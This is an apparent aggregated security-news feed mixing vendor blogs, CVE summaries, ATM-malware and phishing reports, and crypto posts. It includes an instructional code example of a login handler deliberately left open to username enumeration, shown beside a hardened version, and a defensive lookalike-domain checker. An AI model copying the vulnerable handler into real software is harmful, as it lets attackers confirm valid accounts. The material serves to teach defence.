Blog | Avast EN: Managed Workplace patch changes the patching game | Avast Business

As the world’s largest corporate enterprises expand ever-larger, absorbing acquisition after acquisition, the SMB (small to medium-sized business) finds itself working harder than ever to keep a foothold in the marketplace. It leans heavily on its MSP (managed service provider) to keep all things tech running smoothly day in and day out.




McAfee Blogs: How One Healthcare Company Implements DLP to Protect PII and PHI

In 2016, Prime Therapeutics, an American pharmacy benefits management company, hired Jacob Walls to bolster data loss prevention across the enterprise. The company serves 22 Blue Cross Blue Shield health care plans and more than 27 million members nationwide, including one out of every six people covered through US public healthcare exchanges. Since Prime Therapeutics’ employees and systems handle both PII and PHI daily as they interact with Blue Cross Blue Shield, pharmacists, Medicare and Medicaid, and employers, a robust DLP defense is essential.

Defining and Implementing DLP Use Cases Throughout the Enterprise

As a senior information security engineer and Prime Therapeutics’ main DLP expert, Walls, together with his team, spends a lot of time engaging with departments outside of security. First, they work to understand the stakeholders’ DLP-related concerns and define specific use cases to meet their various privacy, compliance, legal, or incident response requirements. Then they create rules for the company’s McAfee Network DLP appliances and McAfee DLP Endpoint agents to test and implement.

“Different departments come to us and request the services for a specific use case,” explains Walls. “We’ll usually provide them with metrics around how well a rule set can address their use case… go over false positive rates and things like that to give them a baseline of how effective [DLP] would be.” Then, after implementing the policy, Walls or another engineer will meet regularly with the requestor of the policy to provide feedback on its effectiveness and, as necessary, tweak for improvements.

For instance, the company’s Privacy and Data Distribution department was concerned that users could print sensitive information on unauthorized printers. Using the built-in local printing rules in the McAfee Network DLP appliance, Walls easily addressed the issue, enforcing the printing of sensitive information only to authorized printers. In addition, discussions on effectiveness led to reporting that filters printing by user and content to pinpoint any employees who need additional education or monitoring.

Preventing Sensitive Data Leakage Via Email

Since email is the primary form of communication with entities outside the network, for many specific departments and the enterprise in general, preventing exfiltration of sensitive information via email message or attachment is one of Prime Therapeutics’ most important DLP use cases. This use case was also the main reason for purchasing McAfee Network DLP.

“Using McAfee Data Loss Prevention, we have implemented corporate policies that restrict sensitive information from exiting the network via email unless authorized and encrypted,” notes Walls. “Moving this functionality from the MTA [Mail Transport Agent] to DLP has allowed for true security ownership and has greatly enhanced our capabilities in this area. Additionally, reporting and metrics around the use of email for communicating sensitive information has helped us internally to gauge the level of risk associated with this communication method…The visibility we now have into outbound email communication has been extremely beneficial on multiple fronts.”

How Successful are These DLP Implementations?

“Effectiveness and speed are driving indicators of success,” says Walls, pointing to lack of data leakage incidents and ease of compliance as components of those two indicators. “The visibility McAfee DLP has given us into both our data at rest and our data in motion has had both an immediate and ongoing positive impact on our business.”

A side benefit of implementing McAfee DLP Endpoint and McAfee Network DLP for Prime Therapeutics has been an increase in awareness across its employee base regarding sensitive data. “Awareness around data-at-rest and the need to place controls around approved locations appears to be growing,” states Walls. “[It] is not limited to specific departments, but rather arises from projects and conversations between all the teams involved. It’s a positive maturing of controls due to greater business awareness of DLP.”

Advice to Those Looking to Implement DLP Solutions

Based on his experience, Walls says he would advise anyone looking at DLP solutions to begin by identifying and prioritizing use cases. “Much of the work around DLP happens outside of the tool and is process-driven,” he elaborates. “Therefore, it’s important to engage with the stakeholders and affected parties even prior to any rule configuration. That said, make sure you know what the DLP solution is capable of, and what it offers for integration and workflow. Doing so up front will save a lot of time and help avoid miscommunication and misaligned expectations.”

Walls also offers words of encouragement. He really enjoys his job, and especially interacting with other areas of the business. “I get great satisfaction in solving a problem and sharing that with the people I’ve solved the problem for,” he claims.

Working with DLP has also shifted Walls’ priorities and expanded his viewpoint. “DLP definitely branches out to other departments and gets you engaged with privacy, with legal—really with your core business,” he says. “I’ve been able to sympathize a little more [and understand better] the desired end results of other departments outside of security. So that’s been helpful.”

“Security is not a one-person job; it can’t be accomplished with one person [or] one company,” concludes Walls. “So we need partners, and we need friends in the industry to work together. The McAfee support team has consistently been available, receptive, and responsive to our questions and needs. ‘Together is Power’ is definitely something that McAfee represents for us.”

To watch a video of Jacob Walls talking about his experience with McAfee and information security, watch below. Get your questions answered by tweeting @McAfee_Business.

The post How One Healthcare Company Implements DLP to Protect PII and PHI appeared first on McAfee Blogs.




Search Msdn: Desired State Configuration (DSC) Planning Update …

In September 2017 we communicated some of our plans for PowerShell Desired State Configuration (DSC). Over the past few months, we have been executing on these plans and collecting feedback from customers and partners. The intent of this blog is to provide an update on the plans we shared back in ...


Search Msdn: What Happened to Bower? | ASP.NET Blog

Bower is a popular package management system for managing static content used by client-side web applications. Visual Studio provides rich support for Bower, including templates and package management tools. Though it doesn’t say it explicitly, it implies that Bower is deprecated. Existing ...


Search Msdn: Community – MSDN Blogs

MSDN Blogs: Get the latest information, insights, announcements, and news from Microsoft experts and developers in the MSDN blogs. Tag: Community ...


Search Msdn: Announcing Entity Framework Core 2.1 Preview 2 | .NET Blog

Today we’re releasing the second preview of EF Core 2.1, alongside .NET Core 2.1 Preview 2 and ASP.NET Core 2.1 Preview 2. Thank you so much to everyone who has tried our early builds and has helped shape this release with their feedback and code contributions! For a more complete description of ...


Search Msdn: Entity Framework Core 2.1 Roadmap | .NET Blog

As mentioned in the announcement of the .NET Core 2.1 roadmap earlier today, at this point we know the overall shape of our next release and we have decided on a general schedule for it. As we approach the release of our first preview later this month, we also wanted to expand on what we have ...


Search Msdn: Entity Framework 6.2 Runtime Released | .NET Blog

Today we announce the availability of EF 6.2 runtime in NuGet.org. Entity Framework (EF) is Microsoft’s traditional object/relational mapper (O/RM) for .NET Framework. To understand the difference between EF6 and EF Core, please refer to our documentation. You can install EF 6.2 either using the ...


Search Msdn: MSDN Blogs

Get the latest information, insights, announcements, and news from Microsoft experts and developers in the MSDN blogs.


IDG Contributor Network: The costs, the privacy and the security of IAM and personal data sharing

The concept of some component (usually software) that manages your personal data is not new. The idea is often associated with Doc Searls, who developed ProjectVRM, which advocates that customers take control of their data in the form of “Vendor Relationship Management” tools.

In my dealings in the consumer IAM space, I’ve become increasingly aware that digital identity and its applications need to be opened up – to do “jobs.” That is, the identity that says “I am who I say I am” is more of a conduit to transfer data between me and some entity I want something from than a statement of my digital self. Our digital lives are now so much more than using login credentials; equating Facebook with a digital identity now seems naive. Instead, services that allow us to perform dynamic identity-based transactions are setting the stage for a new era in personal data.


Evasive new botnet can take over enterprise devices to steal data, spread ransomware

A new, extremely evasive botnet has been discovered that takes unique leverage of command and control servers and can completely take over an enterprise device to execute any type of code it wishes, from ransomware to trojans to data extraction, according to researchers at endpoint and mobile security firm Deep Instinct. The malware–which is...


Three Reasons BIS Crypto Rebuke Is B.S.

What a difference a week makes. Traders in recent days have found more reasons to celebrate cryptocurrencies than to fear them, despite the best efforts of central bankers. The combined market cap of the cryptocurrency market is hovering at more than $293 billion, top digital currencies are trading in a sea of green and investors […]

The post Three Reasons BIS Crypto Rebuke Is B.S. appeared first on Hacked: Hacking Finance.

Pre-Market: Stocks Extend Losses on Next Round of US Tariffs

The main European and Asian indices and US stock futures are all significantly lower just before the Wall Street session, as Donald Trump announced that the administration will seek to extend the trade tariffs targeted at China. The extension would affect another $200 billion of products, and it would be a major escalation of the, […]

The post Pre-Market: Stocks Extend Losses on Next Round of US Tariffs appeared first on Hacked: Hacking Finance.

Hackers Who Hit Winter Olympics 2018 Are Still Alive and Kicking

Remember the 'Olympic Destroyer' cyber attack? The group behind it is still alive and kicking, and has now been found targeting biological and chemical threat prevention laboratories in Europe and Ukraine, and a few financial organisations in Russia. Earlier this year, an unknown group of notorious hackers targeted the Winter Olympic Games 2018, held in South Korea, using a destructive malware that

PageUp: No Sign of Data Exfiltration

But Old Error Logs Contained Clear Text of Incorrect Passwords

Human resources software developer PageUp says it doesn't appear that personal data exposed in a malware attack was actually removed from its systems. But it has also found authentication error logs that recorded incorrect login attempts from before 2007.

ATM Hacking: You Don’t Have to Pay to Play

US Banks are getting Skin in the Game

How many times have you used an Automated Teller Machine (ATM) in your life? Probably too many times to count, and for some people it’s a daily occurrence. Although not usually at the forefront of cyber headlines, ATM hacking has been on the uptick over the past few years and is reportedly a $2 billion global problem.

ATM hacking targets both financial institutions and individuals, depending on the type of attack. Reported losses to financial institutions since 2014 are in the millions of dollars. And of course the cost of absorption of these losses has a trickle-down effect to all banking customers.

Typically observed in Europe and South and Central America, incidents are increasingly being reported in the US. According to the European ATM Crime Report, ATM logical and malware attacks rose 287% from 2015 to 2016. In January of this year, the US Secret Service alerted banks that ATM attacks were being seen in the US, with losses reported to be as high as $1,000,000 over a few incidents. Similarly, two major ATM manufacturers, Diebold Nixdorf Inc. and NCR Corp, warned customers of the outbreak of ATM attacks in the US.

Snippet from USSS Press Release Regarding ATM Hacking

The color of money – not all attack types are the same

There are two primary types of ATM attacks: physical and logical. In a physical attack, the threat actor must be present at the ATM, either before, during, and/or after the attack. It’s reported that physical attacks increased by 12% from 2015 to 2016, and the volume of these types of attacks is much higher than logical attacks.

Types of physical attacks include the following:

  • Skimmers: a device is connected over the card slot of an ATM, which “skims” card information from the customer card upon insertion. Skimmer devices are easily purchased, and possessing one is not necessarily illegal. In Virginia, for example, state code only specifies illegality for possession if malicious intent can be proven.

Skimmer Device Available for Purchase

  • Theft: the ATM is literally hauled away to be broken into at a more convenient time and location. Just this week in Wichita, Kansas, thieves towed an ATM out of a bingo casino, loaded it into the back of a pickup truck, and drove off.
  • Destruction: admittedly a much less sophisticated method, in this scenario attackers destroy the ATM in an attempt to access the cash. Observed techniques have included explosives, torches, “jaws of life” cutters, hammers, and more.

ATM Destructive Physical Attack, Ireland, 2014 (image courtesy of bbc.com)

Logical attacks, or malware-based attacks, don’t necessarily rule out physical access. Physical access may be required to inject the malware and/or to operate a keyboard to run commands. Alternatively, attacks can leverage phishing emails to gain access to administrative credentials. In the case of remote or network-based ATM attacks, the ATM is accessed by “mules” who withdraw the money, typically using a one-time-use PIN or some other control to prevent them from taking money for themselves.

Skimer was the first known ATM malware, and requires manual installation via CD-ROM. Skimer specifically targets Diebold ATMs. First observed in 2009, Skimer is still found in the wild, with samples in VirusTotal collected as recently as May 2018.

Ripper was the first ATM malware observed to target machines from multiple ATM vendors, and it features the use of an ATM card embedded with a malicious Europay, Mastercard, and Visa (EMV) chip that activates the malware. Ripper was notoriously used in a number of ATM attacks in Thailand in 2016.

Other ATM-specific malware requiring physical access for installation includes Ploutus, Padpin-Tyupkin, GreenDispenser, and Alice.

The LookingGlass Cyber research team recently did a deep-dive on a relative newcomer to the ATM hacking scene, the Cutlet Maker malware. Cutlet Maker is installed and launched via a USB connection. This minimally invasive and relatively easy-to-accomplish technique is often referred to as ATM “jackpotting” or a “black box” attack. A full report with details of our analysis is available to STRATISS customers.

Screenshot of Cutlet Maker ATM Malware

ATMitch is a network-based ATM malware that uses Remote Desktop Connection (RDP) from inside a bank’s network to install and execute commands. This network-based malware is typically distributed via a phishing email sent to a bank employee.

Prilex ATM malware targets bank customers by stealing their card information and PIN. It differs from other ATM malware in that it involves a Command & Control (C2) server, to which the stolen credentials are sent.

Show me the money – how ATM malware is distributed

ATM malware is often distributed via DarkNet forums. LookingGlass Cyber researchers have found numerous examples of the sale of various types of ATM malware, as seen in the following images:

Alice ATM Malware Advertised on exploit.in Forum


Cutlet-Maker ATM Malware Advertised on WSM Forum

The odds are stacked against the financial world

Contributing to the growth of ATM malware usage is the plethora of ATMs running outdated or even obsolete operating systems. While precise figures are not widely available, a CNN report from 2014 indicated that 95% of all ATMs were running Windows XP. Updating and/or upgrading the operating system of an ATM can be an expensive and laborious process, since each machine often has to be physically visited to either update the software or completely replace the hardware. A banking advisory company noted that overhauling a fleet of ATMs with new hardware or software is expensive, and banks are less likely to get a boost from marketing new features unless they are among the first to do so. Updates done solely to enhance security, without any anticipated marketing benefit, are unlikely to be appealing to ATM providers due to the cost, and the scale of the fleet is large: according to an FAQ sheet from the ATM Industry Association (ATMIA), as of 2014 there were over 3 million ATMs deployed globally.

Also complicating the issue of protecting ATM devices is the amount of information about them that is available. From manufacturers that provide descriptive marketing videos and user manuals to after-market vendors selling parts and refurbished machines, there is much that hackers can learn about how the machines operate, further aiding their efforts to successfully breach ATMs.

Further compounding the problem, ATMs use a common specification, the XFS Interface promulgated by the European Committee for Standardization. This openly available document provides detailed specifications for how ATMs are operated.

Leveling the odds in your favor

An ATM hack can have lasting effects on an organization. Not only are you liable for loss of money, but the biggest impact will likely be to your brand and reputation. Doug Hevner, of SunTrust Bank, had the following to say about skimming attacks: “So, it’s out there, it’s continuous, and if you haven’t seen it you’re going to see it. And it’s just a question of how do you prepare for that.”

The best way to protect your organization is to educate your employees on what to look for when at an ATM that could become a security risk.

There are a few ways to recognize if an ATM is breached, specifically if it’s been compromised by a skimmer device. The first is by tugging on the ATM to ensure that there is not a malicious overlay installed. We also suggest using ATMs that are located at banks, versus those that can be found in convenience stores, hotels, and other non-financial institutions. Increased surveillance and physical security methods at ATMs may also reduce the risk of attacks. Threat actors are less likely to target a well-lit, heavily-monitored ATM.

As we see ATM attacks increase in the US, financial institutions may find that the exposure to loss outweighs the cost of upgrades and it might be time to replace outdated software and hardware. Another option is looking into technology with the ability to mask vulnerabilities, allowing you time to upgrade outdated systems without compromising security.

The LookingGlass Cyber research team believes that ATM malware attacks will continue to grow in prevalence and popularity and that new malware will be developed. The lure of easy money is always strong. Until the banking industry takes serious steps to improve the security of ATMs, the problem will continue to increase. Outdated software and physically accessible hardware are primary contributors that organizations need to address if they want to avoid the monetary and reputation impacts of this attack vector.

So what do you do if one of your employees’ cards is compromised by ATM malware? Using our monitoring and look-up services you can proactively combat any potential fraud, ensuring the security of your organization and your employees.

Interested in more research like this? Learn more about our STRATISS digital library, where you can learn about cyber trends in your industry, specific threat actors, cyber attack vectors, and more.

The post ATM Hacking: You Don’t Have to Pay to Play appeared first on LookingGlass Cyber Solutions Inc.

Ex-CIA Employee Charged In Major Leak of Agency Hacking Tools

schwit1 shares a report from The Washington Post: Federal prosecutors on Monday charged a former CIA employee with violations of the Espionage Act (Warning: source may be paywalled; alternative source) and related crimes in connection with the leak last year of a collection of hacking tools that the agency used for spy operations overseas. Joshua Adam Schulte, who worked for a CIA group that designs computer code to spy on foreign adversaries, was charged in a 13-count superseding indictment with illegally gathering and transmitting national defense information and other related counts in connection with what is considered to be one of the most significant leaks in CIA history. The indictment accused Schulte of causing sensitive information to be transmitted to an organization, which is not named in the indictment but is thought to be WikiLeaks.

Read more of this story at Slashdot.

Trade Recommendation: district0x

Our April 14, 2018 trade recommendation for the district0x/Bitcoin (DNT/BTC) pair hit the target on April 22 when it went as high as 0.00002304. Those who followed the trade recommendation grew their investments by at least 50% in about a week. The trade recommendation also emphasized to sell immediately once the target is hit. It […]

The post Trade Recommendation: district0x appeared first on Hacked: Hacking Finance.

CVE-2018-1073

The web console login form in ovirt-engine before version 4.2.3 returned different errors for non-existent users and invalid passwords, allowing an attacker to discover the names of valid user accounts.
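The pattern behind this CVE, as an added illustration that is not ovirt-engine code: a login handler whose error text depends on which check failed beside one that returns a single generic error and runs the same password-hash work on both paths. The user store, salt and passwords are constructed sample values.

```python
import hashlib
import hmac

# Constructed sample credential store (username -> (salt, PBKDF2 hash)).
# A fixed salt is used here only to keep the example deterministic.
_SALT = b"constructed-static-salt"


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


USERS = {"alice": (_SALT, _hash("correct horse", _SALT))}


def login_vulnerable(username: str, password: str) -> tuple[bool, str]:
    """The flaw class of CVE-2018-1073: the error text reveals whether the
    account exists, so a list of usernames can be confirmed one by one."""
    rec = USERS.get(username)
    if rec is None:
        return (False, "User not found")
    salt, stored = rec
    if hmac.compare_digest(_hash(password, salt), stored):
        return (True, "OK")
    return (False, "Invalid password")


# Dummy record used when the username is unknown, so the unknown-user path
# performs the same hashing work as the known-user path (also narrows the
# timing difference between the two cases).
_DUMMY = (_SALT, _hash("constructed-dummy-password", _SALT))
GENERIC_ERROR = "Invalid username or password"


def login_hardened(username: str, password: str) -> tuple[bool, str]:
    """Same outcome text for a missing user and a wrong password."""
    salt, stored = USERS.get(username, _DUMMY)
    match = hmac.compare_digest(_hash(password, salt), stored)
    # The membership check prevents a guess of the dummy password from
    # "logging in" a non-existent user.
    if match and username in USERS:
        return (True, "OK")
    return (False, GENERIC_ERROR)


def responses_distinguish_users(login_fn) -> bool:
    """True if the handler's failure message differs between an unknown
    user and a known user with a wrong password (the enumeration signal)."""
    unknown = login_fn("no-such-user", "wrong")[1]
    known = login_fn("alice", "wrong")[1]
    return unknown != known


if __name__ == "__main__":
    print("vulnerable leaks account names:", responses_distinguish_users(login_vulnerable))
    print("hardened leaks account names:  ", responses_distinguish_users(login_hardened))
```

Detection side: a burst of failed logins across many distinct usernames from one source, rather than many attempts against one account, is the log signature to alert on for this flaw class.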

CVE-2018-1061

Python before versions 2.7.15, 3.4.9, 3.5.6 and 3.7.0 is vulnerable to catastrophic backtracking in the difflib.IS_LINE_JUNK method. An attacker could use this flaw to cause a denial of service.

Why Community Is a Lifeline for Cybersecurity Experts

Think about your day-to-day job as one of the many cybersecurity experts working in the industry today: Do you often find yourself frantically typing queries into search engines? Do you struggle to get ahead of problems because you’re scrambling just to keep up? Do you feel like your skills are behind? Does it feel like your company’s approach to security is built upon fighting fires?

If you answered “yes” to any of these questions, you’re not alone. The security landscape is too dynamic to lend itself to hard rules and fixed practices. It’s not a discipline for the weary — it takes grit, time, dedication and tenacity to be successful. To be an effective security professional, we must be innovative and ready for the unexpected. (But this is why you like cybersecurity, right?)

The good news: You’re in good company.

The Cybersecurity Community: No Right or Wrong Answers

I recently returned from a whirlwind tour where I had the opportunity to ask cybersecurity experts around the world about how they do their jobs and their definitions of success. I attended the May 2018 IBM Security Master Skills University event in Orlando, Florida, as well as the recent IAM European User Group meetings in Germany, Sweden, France and Italy. My mission was to tell our clients, partners and colleagues about our new security user group community. During my tour, I also learned that no two organizations approach cybersecurity in the same way.

Take the skills crisis, which is global in scope and affects every organization. I asked cybersecurity experts how their organizations are dealing with the shortfall. I got many answers, including:

  • “Word of mouth with colleagues.”
  • “It’s up to me, so I study on my own time.”
  • “My country doesn’t have a good base of security skills in general.”
  • “Conferences and outside classes.”
  • “Internal training.”
  • “Company Wiki.”
  • “Job shadowing and mentoring.”
  • And my personal favorite: “It’s sink or swim.”

New Collar Dynamics

When I asked cybersecurity experts about how they got into the field in the first place, the answers were just as diverse:

  • “Studied it in university.”
  • “On-the-job training.”
  • “Implementing cryptography on OS/2.”
  • “It was by accident. I started as a software developer.”
  • “A friend dragged me into it because he thought I’d be good at this.”

I can’t help but imagine the contrast between these answers and those I might get if I interviewed a group of accountants or manufacturing engineers. Those established professions have well-defined skills requirements, rich university programs, time-tested certifications and clear job descriptions. Career paths are paved and well-trodden.

In contrast, cybersecurity is what IBM calls a “new collar” job. There are many career paths, low barriers to entry and almost boundless growth opportunity. The flip side of such an exciting career is uncertainty — and often poor direction from the top.

“We suffer from hourglass syndrome: The technicians constantly have sand pouring on them, and, as you go up the hourglass, the lines of communication shrink,” one client told me.

Many cybersecurity experts told me that it’s up to them to find their own opportunities and define their jobs. If you’re the type of person who enjoys getting up each morning not being entirely sure what you’re going to do that day, then I can’t imagine a more exciting career.

Connect With the Cybersecurity Community

The online landscape for security professionals is vast. Change is constant, and new challenges are always just around the corner. Human connection is essential in such an environment, which is why we launched the IBM Security Community. It enables security professionals to connect with each other to problem-solve, share learnings and tips — and even provide emotional support.

This community helps security professionals find local user groups and events; interact with other professionals and IBM experts; utilize education and training resources; and access top technical content from Master Skills University and presentations from recent user group meetings. (Some of the discussion forums already have hundreds of members — and we’re still only a few months into the program.)

My vision for the IBM Security Community is to give clients and partners a trusted resource to help them face the business challenges of today and impact the business outcomes of tomorrow. We will do this together, as isolation isn’t an option in the face of today’s advanced threats.

During my tour, I could see people in the audience visibly relax as I queried audiences about how they do their jobs. It became clear that their chosen profession had few right or wrong answers and that each professional could help the others. Join us, ask one question and answer another. Take our survey and tell us what you want from the community — we are listening.

The post Why Community Is a Lifeline for Cybersecurity Experts appeared first on Security Intelligence.

Can Your Managed Detection and Response Service Do This?

Submitted by Steve Duncan

Trend Micro introduced its Managed Detection and Response service to North America. I had the chance to catch up with Jon Oltsik of ESG again to discuss what we are offering and why we think the time is right.

As attackers become more sophisticated, enterprises must turn to more advanced detection and response capabilities to respond to them. Sometimes an effective detection strategy is to correlate threats from the network, server and endpoints to understand a complete picture of a targeted attack.

Unfortunately due to a cybersecurity skills shortage and a lack of staffing, enterprises struggle to correlate the many alerts and data themselves.

Trend Micro’s Managed Detection and Response provides managed advanced threat hunting on behalf of Trend customers. Customers deploy a unified Trend Micro endpoint solution that includes the ability to record system level activities. The metadata of this recording is continuously sent to the Trend Micro service. Customers also deploy (or have deployed) a Deep Discovery Inspector appliance. This appliance records network-level activities and alerts and sends the metadata to the Trend Micro Managed Detection and Response service. MDR analysts from Trend use this data to build a clear picture of how an advanced threat came in, morphed, and spread. By correlating this information, the service may also identify Industrial IoT devices that may be affected by the attack.

The service provides onboarding support, 24/7 alert monitoring, alert prioritization and investigation, and threat hunting services. Trend Micro will monitor customers’ Deep Discovery and OfficeScan environments, review security events to help determine the root cause/entry point, and enrich event alerts where possible using threat hunting and investigation. Additionally, the Trend analysts will coordinate needed corrective action with the customer and recommend changes to align with best practices in prevention. When necessary, customers will work directly with Trend Micro Security Analysts online and via phone from the Trend Micro Security Operation Center.

While the service is currently delivered by Trend Micro directly, it will be available from selected Trend partners in 2019. More information on the service can be found here.

ICO Analysis: Harmony

As of today, there are no blockchains in existence that can scale to the needs of 5G technology and the internet of things. According to this Huawei article, to meet the requirements of 5G you need 100 billion connections, 1 ms latency and 10 Gbps throughput. New startup, Harmony Protocol, aims to be the first […]

The post ICO Analysis: Harmony appeared first on Hacked: Hacking Finance.

Free Societies are at a Disadvantage in National Cybersecurity

Jack Goldsmith and Stuart Russell just published an interesting paper, making the case that free and democratic nations are at a structural disadvantage in nation-on-nation cyberattack and defense. From a blog post:

It seeks to explain why the United States is struggling to deal with the "soft" cyber operations that have been so prevalent in recent years: cyberespionage and cybertheft, often followed by strategic publication; information operations and propaganda; and relatively low-level cyber disruptions such as denial-of-service and ransomware attacks. The main explanation is that constituent elements of U.S. society -- a commitment to free speech, privacy and the rule of law; innovative technology firms; relatively unregulated markets; and deep digital sophistication -- create asymmetric vulnerabilities that foreign adversaries, especially authoritarian ones, can exploit. These asymmetrical vulnerabilities might explain why the United States so often appears to be on the losing end of recent cyber operations and why U.S. attempts to develop and implement policies to enhance defense, resiliency, response or deterrence in the cyber realm have been ineffective.

I have long thought this to be true. There are defensive cybersecurity measures that a totalitarian country can take that a free, open, democratic country cannot. And there are attacks against a free, open, democratic country that just don't matter to a totalitarian country. That makes us more vulnerable. (I don't mean to imply -- and neither do Russell and Goldsmith -- that this disadvantage implies that free societies are overall worse, but it is an asymmetry that we should be aware of.)

I do worry that these disadvantages will someday become intolerable. Dan Geer often said that "the price of freedom is the probability of crime." We are willing to pay this price because it isn't that high. As technology makes individual and small-group actors more powerful, this price will get higher. Will there be a point in the future where free and open societies will no longer be able to survive? I honestly don't know.

Adidas fans hit by phishing scam

Why users always fall for the lamest phishing scams is beyond comprehension, but hackers take advantage of this weakness and hide their scheming behind the usual fake prizes and too-good-to-be-true giveaways. This time, it was Adidas’ turn to feature in a major phishing scam that targeted users in specific regions.

A fake Adidas campaign promising free shoes instantly became popular through WhatsApp, and it’s not even the first time such a phishing scheme was used this year. To celebrate its 69th anniversary, the sports company was allegedly giving away 2,500 pairs of shoes to users who filled out a four-question survey.

All they had to do was click on a link to claim the prize and share it on WhatsApp with their contacts. The redirections were based on the IP address and targeted mobile devices in Norway, Sweden, Pakistan, Nigeria, Kenya, Macau, United States, Netherlands, Belgium and India.

No matter how many times users tried to share the campaign, they had no way to confirm that the share actually went through. It was just part of the scam. The very detail that they couldn’t choose color or size should have been a hint that it wasn’t a legitimate campaign – either that or the misspelled company name in the spoofed link.

Users were promised free sneakers for a $1 claim fee, but all they were left with was a recurring $50-per-month subscription charge. Through the scam, the fraudsters obtained users’ payment and contact details. The subscription automatically signs users up for the “organizejobs” service, which has been identified as a scam.
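The campaign above gave itself away through a misspelled company name in the link. The following script is an added example, not code from the article or from Adidas or WhatsApp: it scores the hostname of a URL against a list of protected brands using homoglyph normalisation and Damerau-Levenshtein edit distance, the kind of check a mail or web gateway can run before a user reaches the page. The brand list, the allowlist and every URL are constructed for illustration.

```python
"""Lookalike-domain check for phishing links.

Added example, not code from the article or from Adidas/WhatsApp. The brand
list, allowlist and all URLs are constructed for illustration.
"""
from urllib.parse import urlsplit

PROTECTED_BRANDS = ["adidas", "whatsapp"]          # assumed brand list
ALLOWLIST = {"adidas.com", "whatsapp.com"}         # assumed known-good registrable domains

# A small, illustrative map of characters used to imitate ASCII letters
HOMOGLYPHS = {"rn": "m", "vv": "w", "0": "o", "1": "l", "3": "e", "5": "s",
              "7": "t", "\u00e4": "a", "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0456": "i"}


def normalise(label: str) -> str:
    """Lower-case a DNS label and map common homoglyphs to plain ASCII."""
    s = label.lower()
    for src, dst in HOMOGLYPHS.items():
        s = s.replace(src, dst)
    return s


def damerau_levenshtein(a: str, b: str) -> int:
    """Edit distance with insert, delete, substitute and adjacent transposition."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def check_host(host: str):
    """Return a list of (brand, reason) findings for a hostname; [] means nothing odd."""
    host = host.lower().rstrip(".")
    labels = host.split(".")
    if len(labels) < 2:
        return []
    # Naive registrable domain: assumes a one-label public suffix (use a PSL in production)
    registrable = ".".join(labels[-2:])
    if registrable in ALLOWLIST:
        return []
    findings = []
    for label in labels[:-1]:                       # every label except the TLD
        norm = normalise(label)
        # Compare the whole label and each hyphen-separated piece of it
        candidates = [norm] + [p for p in norm.split("-") if p and p != norm]
        for brand in PROTECTED_BRANDS:
            dist, cand = min((damerau_levenshtein(c, brand), c) for c in candidates)
            threshold = 2 if len(brand) > 6 else 1   # looser for longer brand names
            if dist == 0:
                findings.append((brand, f"brand name '{cand}' under non-allowlisted domain {registrable}"))
            elif dist <= threshold:
                findings.append((brand, f"lookalike '{cand}' (edit distance {dist} from '{brand}')"))
            elif brand in norm:
                findings.append((brand, f"brand embedded in label '{label}'"))
    return findings


def check_url(url: str):
    """Extract the hostname from a URL and run check_host on it."""
    return check_host(urlsplit(url).hostname or "")


if __name__ == "__main__":
    for u in ["https://www.adidas.com/", "http://adldas.com/claim", "http://shop.ad1das-gift.net/"]:
        print(u, check_url(u))
```

The registrable-domain logic deliberately stays naive (last two labels); a production check needs the Public Suffix List so that `brand.co.uk` and `brand.example.co.uk` are handled correctly, and the edit-distance threshold should be tuned per brand, since a one-edit threshold on a short brand name will collide with ordinary words.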

Early detection of compromised credentials can greatly reduce impact of attacks

According to Blueliv’s credential detection data, since the start of 2018 there has been a 39% increase in the number of compromised credentials detected from Europe and Russia, compared to the same period in 2017 (January-May). In fact, Europe and Russia are now home to half of the world’s credential theft victims (49%). In this podcast, Patryk Pilat, Head of Engineering and Cyberthreat Intelligence at Blueliv, talks about the report, and illustrates how these startling …

The post Early detection of compromised credentials can greatly reduce impact of attacks appeared first on Help Net Security.

MPs share concern over cyber threat to critical national infrastructure

New insight from global cyber security and risk mitigation expert, NCC Group, has revealed that two thirds of MPs consider the compromise of critical national infrastructure to be the biggest cyber security threat facing the UK.


A year on from the cyber attack on parliamentary emails, a YouGov survey commissioned by NCC Group has gauged the opinions of MPs in the House of Commons with regards to their personal cyber security, the cyber risks associated with national security and societal wellbeing, and the consequences of a successful attack on parliament. The results revealed that 62% of MPs across all regions, including 70% of Conservatives and 57% of Labour MPs, consider a compromise of critical national infrastructure to be the biggest risk.


Despite this common ground between MPs across parties on the threat to critical national infrastructure, the survey indicated divides with regards to the severity of other cyber threats. 42% of Conservatives said that they consider a compromise of nuclear capabilities to be one of the top two threats, compared to just 14% of Labour MPs, while 44% of Labour MPs considered democratic interference to be a significant threat, compared to 16% of Conservative MPs.


Alongside this, the survey highlighted that 75% of all MPs are concerned that a breach of their personal email could negatively affect the cyber security of the House of Commons, highlighting that most MPs understand the crucial role they personally play in enhancing the UK Parliament’s security posture.


It was also revealed that, in the event of a successful cyber attack, 73% of all MPs considered the breach of constituents’ privacy to be their biggest concern, alongside a leak of sensitive information relating to parliamentary business (46%).


These results have been released ahead of a meeting at the House of Commons today, which will address the cyber threats challenging the UK political landscape and outline how MPs can best contribute towards tackling this growing threat.


Ollie Whitehouse, global chief technical officer at NCC Group, said: “It’s very positive to see that a majority of MPs are aware of the different threats we face and realise the gravitas of a successful attack, particularly with regards to our resilience as a nation.


“In recent years, the government has been proactive in implementing initiatives to strengthen the UK’s stance against evolving technical and geopolitical threats which attempt to compromise the integrity of our nations. MPs play a significant role in these initiatives, so it’s important to maintain continued education around modern threats and informed dialogue amongst all stakeholders. This will ensure that parliamentary staff at all levels understand the steps they need to take, in both their professional and personal lives, in order to address cyber risk head on.”

The post MPs share concern over cyber threat to critical national infrastructure appeared first on IT SECURITY GURU.

Olympic Destroyer is back, targeting chemical, biological and nuclear threat protection entities in Europe

